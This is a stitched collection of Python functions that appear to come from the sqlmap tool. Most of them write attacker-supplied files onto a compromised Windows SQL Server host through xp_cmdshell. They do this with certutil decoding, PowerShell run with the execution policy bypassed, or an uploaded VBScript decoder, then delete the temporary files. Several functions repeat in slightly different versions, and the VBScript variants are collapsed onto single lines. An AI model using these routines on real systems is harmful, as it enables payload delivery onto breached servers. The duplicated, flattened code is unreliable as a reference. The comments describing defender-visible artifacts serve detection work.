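def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
    """
    Writes wFileContent to dFile by uploading it base64-encoded into a
    temporary file under tmpPath and decoding that file with certutil.exe

    wFile is not used by this method.

    Artifacts this leaves for a defender to look for: a "tmpf<random>.txt"
    file under tmpPath and one command line chaining "cd", "certutil -f
    -decode" and "del /F /Q".
    """

    infoMsg = "using certutil.exe to write the %s " % fileType
    infoMsg += "file content to file '%s', please wait.." % dFile
    logger.info(infoMsg)

    chunkMaxSize = 500

    randFile = "tmpf%s.txt" % randomStr(lowercase=True)
    # The backslash is escaped explicitly: "\%" is not a valid escape
    # sequence and raises an invalid-escape warning on recent Python versions
    randFilePath = "%s\\%s" % (tmpPath, randFile)

    encodedFileContent = base64encode(wFileContent)

    # Break the base64 text into lines of at most chunkMaxSize characters
    splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])

    logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)

    self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)

    logger.debug("decoding the file to %s.." % dFile)

    # Decode and clean up in a single command line; the temporary file is
    # referenced by bare name, so the "cd" into tmpPath has to come first
    commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), "del /F /Q %s" % randFile)
    complComm = " & ".join(commands)

    self.execCmd(complComm)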
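def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
    """
    Uploads wFileContent as line-wrapped base64 text to a temporary file in
    tmpPath, then has certutil.exe decode it into dFile and removes the
    temporary file

    The wFile argument is not read anywhere in this method.

    Observable on the host: a "tmpf<random>.txt" file in tmpPath and a
    command line of the form cd & certutil -f -decode & del /F /Q.
    """

    infoMsg = "using certutil.exe to write the %s " % fileType
    infoMsg += "file content to file '%s', please wait.." % dFile
    logger.info(infoMsg)

    chunkMaxSize = 500

    randFile = "tmpf%s.txt" % randomStr(lowercase=True)
    # "\\" instead of a bare "\" before "%": same resulting string, but no
    # invalid escape sequence warning from the Python compiler
    randFilePath = "%s\\%s" % (tmpPath, randFile)

    encodedFileContent = base64encode(wFileContent)

    # One line of at most chunkMaxSize base64 characters per chunk
    chunks = []
    for i in xrange(0, len(encodedFileContent), chunkMaxSize):
        chunks.append(encodedFileContent[i:i + chunkMaxSize])
    splittedEncodedFileContent = '\n'.join(chunks)

    logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
    self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)

    logger.debug("decoding the file to %s.." % dFile)

    # Change directory, decode, delete the temporary file - all in one command
    commands = (
        "cd \"%s\"" % tmpPath,
        "certutil -f -decode %s %s" % (randFile, dFile),
        "del /F /Q %s" % randFile
    )

    self.execCmd(" & ".join(commands))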
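def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
    """
    Writes wFileContent to dFile by uploading a one-line PowerShell script
    that carries the whole content as a base64 string literal, and then
    running that script

    The uploaded script is not deleted by this method. Artifacts a defender
    can look for: a "tmpf<random>.ps1" file under tmpPath and a
    "powershell -ExecutionPolicy ByPass -File" invocation pointing at it.
    """

    infoMsg = "using PowerShell to write the %s file content " % fileType
    infoMsg += "to file '%s'" % dFile
    logger.info(infoMsg)

    randPSScript = "tmpf%s.ps1" % randomStr(lowercase=True)
    # The backslash is escaped explicitly: "\%" is not a valid escape
    # sequence and raises an invalid-escape warning on recent Python versions
    randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)

    encodedFileContent = base64encode(wFileContent)

    # NOTE(review): the "^" before ">" looks like cmd.exe escaping so that the
    # redirection survives the upload step - confirm against xpCmdshellWriteFile
    psString = "[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(\"%s\")) ^> \"%s\"" % (encodedFileContent, dFile)

    logger.debug("uploading the PowerShell script to %s, please wait.." % randPSScriptPath)
    self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)

    logger.debug("executing the PowerShell script to write the %s file" % dFile)
    self.execCmd("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath)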
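def _client(url, options=None):
    """
    Sends a request to url and returns the raw response body

    When options is not None it is serialized with jsonize() and sent as the
    request body. If DataStore holds a username or password, an HTTP Basic
    Authorization header is added. Any exception raised while building or
    sending the request is re-raised to the caller.
    """

    logger.debug("Calling '%s'" % url)

    try:
        data = None

        if options is not None:
            data = jsonize(options)

        headers = {"Content-Type": "application/json"}

        if DataStore.username or DataStore.password:
            # NOTE: Basic credentials are only base64-encoded, not encrypted, and
            # the scheme of url is not checked here - over plain HTTP they are
            # readable by anyone on the network path
            headers["Authorization"] = "Basic %s" % base64encode("%s:%s" % (DataStore.username or "", DataStore.password or ""))

        req = _urllib.request.Request(url, data, headers)
        response = _urllib.request.urlopen(req)

        # Always release the connection, even when read() fails
        try:
            text = response.read()
        finally:
            response.close()
    except:
        # Deliberately broad: the error is only logged here and then re-raised
        if options:
            logger.error("Failed to load and parse %s" % url)
        raise

    return text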
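def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
    """
    Writes wFileContent to dFile by uploading it base64-encoded in chunks to
    a temporary text file, uploading a small PowerShell decoding script next
    to it, and running that script

    Both temporary files are deleted in the same command line that runs the
    script. Artifacts a defender can look for: "tmpf<random>.txt" and
    "tmpps<random>.ps1" under tmpPath, and a "powershell -ExecutionPolicy
    ByPass -File" invocation followed by two "del /F /Q" commands.
    """

    infoMsg = "using PowerShell to write the %s file content " % fileType
    infoMsg += "to file '%s'" % dFile
    logger.info(infoMsg)

    encodedFileContent = base64encode(wFileContent)
    encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
    # The backslash is escaped explicitly: "\%" is not a valid escape
    # sequence and raises an invalid-escape warning on recent Python versions
    encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)

    randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
    randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)

    wFileSize = len(encodedFileContent)
    chunkMaxSize = 1024

    logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)

    # One upload call per chunk, all aimed at the same temporary file
    # NOTE(review): presumably xpCmdshellWriteFile appends to it - confirm
    for i in xrange(0, wFileSize, chunkMaxSize):
        wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
        self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)

    # The script reads the text file back, strips tabs and line breaks,
    # base64-decodes it and writes the resulting bytes to dFile
    psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
    psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
    psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
    psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile

    logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
    self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)

    logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)

    commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "del /F /Q \"%s\"" % encodedBase64FilePath, "del /F /Q \"%s\"" % randPSScriptPath)
    complComm = " & ".join(commands)

    self.execCmd(complComm)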
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
    """
    Uploads wFileContent as base64 text (in chunks) to a temporary file in
    tmpPath, uploads a PowerShell script that decodes that file into dFile,
    then runs the script and deletes both temporary files in one command line

    Observable on the host: "tmpf<random>.txt" and "tmpps<random>.ps1" in
    tmpPath, and a "powershell -ExecutionPolicy ByPass -File" invocation
    chained with two "del /F /Q" commands.
    """

    logger.info("using PowerShell to write the %s file content " % fileType + "to file '%s'" % dFile)

    payload = base64encode(wFileContent)

    # Temporary names are generated in this order: text file, then script
    b64Name = "tmpf%s.txt" % randomStr(lowercase=True)
    b64Path = "%s\\%s" % (tmpPath, b64Name)
    scriptName = "tmpps%s.ps1" % randomStr(lowercase=True)
    scriptPath = "%s\\%s" % (tmpPath, scriptName)

    step = 1024

    logger.debug("uploading the base64-encoded file to %s, please wait.." % b64Path)

    # Each slice goes through its own upload call against the same file
    offset = 0
    total = len(payload)
    while offset < total:
        self.xpCmdshellWriteFile(payload[offset:offset + step], tmpPath, b64Name)
        offset += step

    # Decoder: read the text back, drop tabs/line breaks, decode, write bytes
    psString = "".join((
        "$Base64 = Get-Content -Path \"%s\"; " % b64Path,
        "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = ",
        "[System.Convert]::FromBase64String($Base64); Set-Content ",
        "-Path \"%s\" -Value $Content -Encoding Byte" % dFile,
    ))

    logger.debug("uploading the PowerShell base64-decoding script to %s" % scriptPath)
    self.xpCmdshellWriteFile(psString, tmpPath, scriptName)

    logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)

    runScript = "powershell -ExecutionPolicy ByPass -File \"%s\"" % scriptPath
    dropPayload = "del /F /Q \"%s\"" % b64Path
    dropScript = "del /F /Q \"%s\"" % scriptPath

    self.execCmd(" & ".join([runScript, dropPayload, dropScript]))
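def download(taskid, target, filename):
    """
    Download a certain file from the file system

    Returns a JSON document: {"success": True, "file": <base64 content>} when
    the file exists inside the output directory, otherwise {"success": False,
    "message": ...} for an unknown task ID, a path that resolves outside the
    output directory, or a missing file.
    """

    if taskid not in DataStore.tasks:
        logger.warning("[%s] Invalid task ID provided to download()" % taskid)
        return jsonize({"success": False, "message": "Invalid task ID"})

    root = os.path.abspath(paths.SQLMAP_OUTPUT_PATH)
    path = os.path.abspath(os.path.join(root, target, filename))

    # Prevent file path traversal. The comparison is made against the root
    # followed by a path separator: a bare prefix test would also accept a
    # sibling directory whose name merely starts with the root's name
    # (e.g. "<output>_other"), which lies outside the output directory.
    # NOTE: abspath() only normalizes ".." lexically; symbolic links placed
    # inside the output directory are not resolved by this check
    if not path.startswith(os.path.join(root, "")):
        logger.warning("[%s] Forbidden path (%s)" % (taskid, target))
        return jsonize({"success": False, "message": "Forbidden path"})

    if os.path.isfile(path):
        logger.debug("(%s) Retrieved content of file %s" % (taskid, target))
        with open(path, 'rb') as inf:
            file_content = inf.read()
        return jsonize({"success": True, "file": base64encode(file_content)})
    else:
        logger.warning("[%s] File does not exist %s" % (taskid, target))
        return jsonize({"success": False, "message": "File does not exist"})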
# Writes wFileContent to dFile: the content is uploaded base64-encoded to a
# temporary "tmpf<random>.txt" file under tmpPath, a VBScript decoder stub
# ("tmps<random>.vbs") is uploaded next to it, and a single command line then
# changes into tmpPath, runs the stub with "cscript //nologo" and deletes both
# temporary files with "del /F /Q".
#
# The stub reads the text file, strips spaces, CR and LF, decodes it with its
# own base64_decode()/mimedecode() functions and writes the result through
# Scripting.FileSystemObject.OpenTextFile(outputFilePath, 2, True).
#
# Artifacts a defender can look for: the two temporary files named above and
# the cscript invocation chained with the two deletions.
#
# NOTE(review): in this listing the line breaks and indentation inside the
# triple-quoted VBScript literal are collapsed, so both the literal and the
# vbs.replace(" ", "") call should be checked against the upstream file
# before the snippet is relied on.
# NOTE(review): "%s\%s" depends on "\%" not being a recognised escape
# sequence; "%s\\%s" yields the same string without the compiler warning.
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using a custom visual basic script to write the " infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) logger.info(infoMsg) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\%s" % (tmpPath, randFile) vbs = """Dim inputFilePath, outputFilePath inputFilePath = "%s" outputFilePath = "%s" Set fs = CreateObject("Scripting.FileSystemObject") Set file = fs.GetFile(inputFilePath) If file.Size Then Wscript.Echo "Loading from: " & inputFilePath Wscript.Echo Set fd = fs.OpenTextFile(inputFilePath, 1) data = fd.ReadAll fd.Close data = Replace(data, " ", "") data = Replace(data, vbCr, "") data = Replace(data, vbLf, "") Wscript.Echo "Fixed Input: " Wscript.Echo data Wscript.Echo decodedData = base64_decode(data) Wscript.Echo "Output: " Wscript.Echo decodedData Wscript.Echo Wscript.Echo "Writing output in: " & outputFilePath Wscript.Echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) ofs.Write decodedData ofs.close Else Wscript.Echo "The file is empty." 
End If Function base64_decode(byVal strIn) Dim w1, w2, w3, w4, n, strOut For n = 1 To Len(strIn) Step 4 w1 = mimedecode(Mid(strIn, n, 1)) w2 = mimedecode(Mid(strIn, n + 1, 1)) w3 = mimedecode(Mid(strIn, n + 2, 1)) w4 = mimedecode(Mid(strIn, n + 3, 1)) If Not w2 Then _ strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) If Not w3 Then _ strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) If Not w4 Then _ strOut = strOut + Chr(((w3 * 64 + w4) And 255)) Next base64_decode = strOut End Function Function mimedecode(byVal strIn) Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" If Len(strIn) = 0 Then mimedecode = -1 : Exit Function Else mimedecode = InStr(Base64Chars, strIn) - 1 End If End Function""" % (randFilePath, dFile) vbs = vbs.replace(" ", "") encodedFileContent = base64encode(wFileContent) logger.debug( "uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) logger.debug( "uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, "del /F /Q %s" % randVbs, "del /F /Q %s" % randFile) complComm = " & ".join(command for command in commands) self.execCmd(complComm)
# Uploads wFileContent as base64 text to "tmpf<random>.txt" in tmpPath,
# uploads a VBScript stub "tmps<random>.vbs" that decodes that text into
# dFile, and then issues one command line that enters tmpPath, runs the stub
# via "cscript //nologo" and removes both temporary files ("del /F /Q").
#
# Decoding happens entirely inside the stub (its base64_decode() and
# mimedecode() functions); the output is written with
# Scripting.FileSystemObject.OpenTextFile(outputFilePath, 2, True).
#
# Observable on the host: the .txt/.vbs pair in tmpPath and the cscript
# command chained with the two deletions.
#
# NOTE(review): the VBScript literal appears here with its original line
# breaks and indentation collapsed; verify the literal and the
# vbs.replace(" ", "") argument against the upstream source.
# NOTE(review): both "%s\%s" format strings contain the invalid escape "\%";
# writing "%s\\%s" produces the same text and avoids the warning.
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): infoMsg = "using a custom visual basic script to write the " infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) logger.info(infoMsg) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFilePath = "%s\%s" % (tmpPath, randFile) vbs = """Dim inputFilePath, outputFilePath inputFilePath = "%s" outputFilePath = "%s" Set fs = CreateObject("Scripting.FileSystemObject") Set file = fs.GetFile(inputFilePath) If file.Size Then Wscript.Echo "Loading from: " & inputFilePath Wscript.Echo Set fd = fs.OpenTextFile(inputFilePath, 1) data = fd.ReadAll fd.Close data = Replace(data, " ", "") data = Replace(data, vbCr, "") data = Replace(data, vbLf, "") Wscript.Echo "Fixed Input: " Wscript.Echo data Wscript.Echo decodedData = base64_decode(data) Wscript.Echo "Output: " Wscript.Echo decodedData Wscript.Echo Wscript.Echo "Writing output in: " & outputFilePath Wscript.Echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True) ofs.Write decodedData ofs.close Else Wscript.Echo "The file is empty." 
End If Function base64_decode(byVal strIn) Dim w1, w2, w3, w4, n, strOut For n = 1 To Len(strIn) Step 4 w1 = mimedecode(Mid(strIn, n, 1)) w2 = mimedecode(Mid(strIn, n + 1, 1)) w3 = mimedecode(Mid(strIn, n + 2, 1)) w4 = mimedecode(Mid(strIn, n + 3, 1)) If Not w2 Then _ strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) If Not w3 Then _ strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) If Not w4 Then _ strOut = strOut + Chr(((w3 * 64 + w4) And 255)) Next base64_decode = strOut End Function Function mimedecode(byVal strIn) Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" If Len(strIn) = 0 Then mimedecode = -1 : Exit Function Else mimedecode = InStr(Base64Chars, strIn) - 1 End If End Function""" % (randFilePath, dFile) vbs = vbs.replace(" ", "") encodedFileContent = base64encode(wFileContent) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, "del /F /Q %s" % randVbs, "del /F /Q %s" % randFile) complComm = " & ".join(command for command in commands) self.execCmd(complComm)